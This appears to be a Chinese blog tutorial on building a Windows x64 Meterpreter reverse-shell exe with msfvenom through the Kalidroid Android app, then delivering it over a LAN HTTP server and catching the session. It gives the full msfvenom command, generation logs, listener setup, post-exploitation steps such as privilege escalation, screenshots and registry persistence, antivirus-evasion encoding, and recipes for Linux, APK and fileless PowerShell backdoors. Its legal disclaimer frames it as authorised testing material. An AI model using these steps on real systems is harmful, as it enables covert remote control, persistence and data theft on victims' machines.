Kalidroid msfvenom 载荷生成完整实战教程|手机一键制作 Windows 反弹木马 + 内网分发

Kalidroid msfvenom 载荷生成完整实战教程|手机一键制作 Windows 反弹木马 + 内网分发

前言

msfvenom 是 Metasploit 框架内置的载荷生成工具,传统需要电脑 Kali 操作,而 Kalidroid 将其封装为全图形化界面,无需记忆冗长命令,安卓手机就能生成 Windows、Linux、Android、脚本类反弹 Shell 后门程序。

 

本文基于真机 ( 华为p90,Kalidroid v1.3.29-debug)全套实操截图,完整演示Windows x64 反弹 Meterpreter exe 载荷生成 + 内网 Python HTTP 服务分发木马全流程,所有操作仅限拥有书面合法授权的测试环境使用。

一、msfvenom 模块入口与模式介绍

1. 进入 msfvenom 模块

打开 Kalidroid 主界面,找到 Metasploit 功能入口进入,顶部 MODE 栏包含 4 种运行模式,本次实操选择红色高亮的 msfvenom 模式。

20260719071002250-20e347f5082e684a3daebf14ffe90333

模式说明:

  • msfconsole:交互式漏洞攻击控制台(上一篇教程内容)
  • msfvenom:一次性生成各类系统反弹载荷后门(本文核心)
  • Handler:独立监听端口,等待木马反弹连接
  • msfrpcd:MSF 远程 RPC 服务,用于自动化脚本联动
页面提示:msfvenom 仅单次生成 payload 文件,不会持续开启监听会话,生成后门后需要单独开启 Handler/msfconsole 监听端口。

2. 内置全平台载荷分类

软件图形化封装主流系统载荷,覆盖渗透测试全部场景:
  1. Windows 平台
    • meterpreter (win x64):64 位 Windows 交互式反弹 Shell(本次选用)
    • meterpreter (win x86):32 位 Windows 系统专用
    • shell (win x64):基础 cmd 无功能反弹 shell
  2. Linux 平台
    • meterpreter (linux x64/arm64):服务器、ARM 设备专用载荷
  3. Android 平台
    • meterpreter (android):APK 安卓木马
  4. Web 脚本载荷
     

    python/php reverse_tcp、powershell、bash 等网页 / 脚本后门

本次实操选择:meterpreter (win x64) windows · staged,自动填充载荷字符串:windows/x64/meterpreter/reverse_tcp

20260719071110262-d2e801a6c503c42f237cccef8eae37c4

二、载荷核心参数可视化配置详解

1. 监听器 LHOST & LPORT(木马回连地址)

  • LHOST:手机局域网 IP 192.168.10.6,目标运行木马后会主动连接这个地址
  • LPORT:监听端口,标准默认 4444(可自定义 5000、8080 等未占用端口)
     

    提示区分内网 / 外网:

     

    内网测试填写手机局域网 IP;外网公网测试需要填写公网 IP,并在路由器做端口转发映射 LPORT 端口。

2. OUTPUT FORMAT 输出格式(关键)

软件内置几十种文件输出格式,对应不同操作系统:
格式 适用系统 用途
exe Windows 可直接双击运行的 Windows 可执行程序(本次选用)
elf / elf-so Linux Linux 二进制程序、动态链接库
apk Android 安卓安装包木马
dll Windows 动态链接库注入后门
psh / psh-net Windows Powershell 内存执行脚本
python/php/bash Web / 服务器 一句话反弹脚本

20260719071215197-9906ad663b9c063d483a6f0520ffbad9

本次实操选择 exe 格式,生成 Windows 可执行木马文件。

3. 输出文件路径

默认生成路径 /root/payload.bin,切换 exe 格式后自动重命名为 payload.exe,文件保存在 Kalidroid 虚拟机根目录,后续可通过 HTTP 服务下载。
4. 编码器(免杀基础混淆)
编码器用于混淆载荷特征,降低杀毒软件查杀概率:
  • (none):无编码,原生载荷,杀毒极易拦截(本次测试选用)
  • shikata_ga_nai:多态变形编码器,最常用免杀混淆
  • x64/xor、powershell_base64:对应架构 / 脚本专用编码
     

    进阶场景可勾选 shikata_ga_nai 提升免杀效果,新手学习可先选择 none。

5. 自定义高级参数
输入框可补充 msfvenom 原生参数,示例本次配置:

 

--platform linux · -b '\x00'

  • --platform linux:指定目标系统平台
  • -b '\x00':剔除载荷中的空字节,避免程序运行报错
6. 全局启动设置开关
  1. 自动初始化 msfdb:生成载荷无需数据库,可关闭节省内存
  2. 安静横幅:跳过 MSF 启动大段 ASCII 字符画,界面更简洁
  3. ANSI 颜色:开启终端彩色日志,区分成功 / 报错信息

20260719071319624-195e1fdbb48af69d43a182352caf5689

三、一键生成 Windows 反弹木马完整流程

步骤 1:参数汇总核对
  • 载荷:windows/x64/meterpreter/reverse_tcp
  • LHOST:192.168.10.6
  • LPORT:4444
  • 输出格式:exe
  • 编码器:none
  • 自定义参数:–platform linux -b ‘\x00’
步骤 2:执行生成
确认全部参数后,点击底部蓝色 生成有效载荷 按钮,软件自动拼接完整 msfvenom 命令执行:
msfvenom -p 'windows/x64/meterpreter/reverse_tcp' LHOST=192.168.10.6 LPORT=4444 -f exe -o /root/payload.exe --platform linux -b '\x00'

20260719071409415-314c231d5041f96970968e638ee1976b

步骤 3:生成结果日志解读

[-] No platform was selected, choosing Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 509 bytes
Final size of exe file: 7680 bytes
Saved as: /root/payload.exe

20260719071436432-605c0304c24b6a5ab70e94c4ab6b7f8c

日志关键信息:
  1. 自动识别目标系统 Windows x64 架构
  2. 未使用编码器,原生载荷 509 字节,打包 exe 后总大小 7.6KB
  3. 文件成功保存至虚拟机根目录 /root/payload.exe

四、内网 HTTP 服务分发木马(让 Windows 主机下载后门)

木马生成后需要传输到目标 Windows 设备,本文演示手机内置 Python3 简易 HTTP 服务器分发方案。

1. 开启端口转发(虚拟机端口映射)

进入 Kalidroid 全局设置→网络页面,添加端口转发规则:8080 → 8080 (tcp)

20260719071530857-252a01df8fda207c6f671d6424a7b6e9

作用:将虚拟机内部 8080 端口映射到手机局域网,内网其他设备可通过手机 IP 访问虚拟机内的文件服务。

2. 终端启动 Python 文件服务

打开 Kalidroid 内置 Terminal 终端,执行两条命令:
  1. ls 查看根目录文件,确认 payload.exe 存在
  2. python3 -m http.server 8080
     

    启动成功提示:Serving HTTP on 0.0.0.0 port 8080

20260719071601605-1092259464da0ab4f125e34be29b835a

3. Windows 浏览器下载木马

在同一局域网 Windows 电脑打开浏览器,访问地址:

 

http://192.168.10.6:8080

 

页面列出虚拟机根目录全部文件,找到 payload.exe 点击,弹出下载弹窗,确认保存到 Windows 本地。

五、木马上线前置:开启 MSF 监听
木马下载到目标 Windows 主机后,必须提前在 Kalidroid 开启监听,否则木马运行后无法回连获取会话,两种监听方案:
  1. Handler 模式:仅开启端口监听,轻量化占用内存
  2. msfconsole 模式:完整交互式控制台,推荐新手使用
     

    监听核心参数和生成木马保持一致:LHOST=192.168.10.6,LPORT=4444,载荷选择 windows/x64/meterpreter/reverse_tcp。

20260719071623586-a2a1bb977c7697429940f66d6ea1a684

20260719071631954-36f238717e49609f98ed96eb41d810da

上线后可执行操作

目标双击运行 payload.exe 后,手机 MSF 会收到 Meterpreter 会话,可完成:
  • sysinfo:查看 Windows 系统版本、硬件信息
  • getsystem:提升至系统最高管理员权限
  • upload/download:双向上传下载主机文件
  • screenshot:实时截取目标电脑屏幕
  • persist 模块:写入注册表实现开机自启持久化后门

六、多场景载荷生成方案(按需选用)

方案 1:Windows 免杀基础后门

  • 载荷:win x64 meterpreter
  • 输出格式:exe
  • 编码器:shikata_ga_nai
  • 适用:内网无杀毒测试环境

方案 2:Linux 服务器后门

  • 载荷:linux x64 meterpreter
  • 输出格式:elf
  • LPORT:4444
  • 分发:Python HTTP 服务传输 elf 文件,chmod 赋予执行权限

方案 3:安卓 APK 木马

  • 载荷:meterpreter (android)
  • 输出格式:apk
  • 分发:浏览器下载 APK 安装至测试安卓设备

方案 4:Powershell 无文件内存后门

  • 输出格式:psh-net
  • 无需生成 exe 文件,复制脚本直接在 Windows 终端执行,不留本地文件痕迹

七、常见报错与排错指南

故障现象 原因 解决办法
生成载荷命令执行失败 自定义参数语法错误 清空自定义参数输入框,使用图形按钮配置
Windows 下载页面无法访问 未开启端口转发;防火墙拦截 8080 端口 全局设置添加 8080 端口转发;关闭手机 / 电脑防火墙
木马双击运行无会话上线 LHOST/LPORT 填写错误;监听未提前开启;目标防火墙拦截 4444 端口 核对手机局域网 IP;提前打开 Handler 监听;放行目标出站 4444 端口
exe 木马直接被 Windows Defender 删除 未使用编码器混淆载荷特征 切换 shikata_ga_nai 编码器,多次编码提升免杀
终端执行 python3 提示命令不存在 未预装 Python3 环境 终端执行apt update && apt install python3安装依赖

八、法律合规重要警示

  1. 本教程仅用于企业内部安全自查、授权渗透测试、网络安全专业学习,严禁对未授权设备、服务器、个人电脑生成、传播、运行后门程序,私自制作木马入侵他人设备触犯《网络安全法》《刑法》,需承担刑事责任。
  2. 测试结束后,立即删除所有生成的 payload 后门文件,关闭监听端口、HTTP 文件服务,清除所有测试日志,消除安全痕迹。
  3. 禁止将生成的后门程序传播、分享给第三方,禁止用于牟利、窃取数据、破坏系统等恶意行为。

教程完整流程总结

  1. 打开 Kalidroid Metasploit 模块,切换 msfvenom 载荷生成模式;
  2. 选择对应系统架构载荷,填写手机回连 IP(LHOST)、监听端口(LPORT);
  3. 选择输出文件格式(exe/elf/apk 等),按需添加编码器混淆;
  4. 一键生成后门程序,文件自动保存至虚拟机根目录;
  5. 全局设置添加端口转发,终端启动 Python HTTP 服务,内网设备浏览器下载木马;
  6. 切换 msfconsole/Handler 开启对应端口监听;
  7. 授权测试设备运行木马,等待 Meterpreter 会话上线完成渗透。

系列教程回顾

© 版权声明
THE END
喜欢就支持一下吧
点赞12赞赏 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容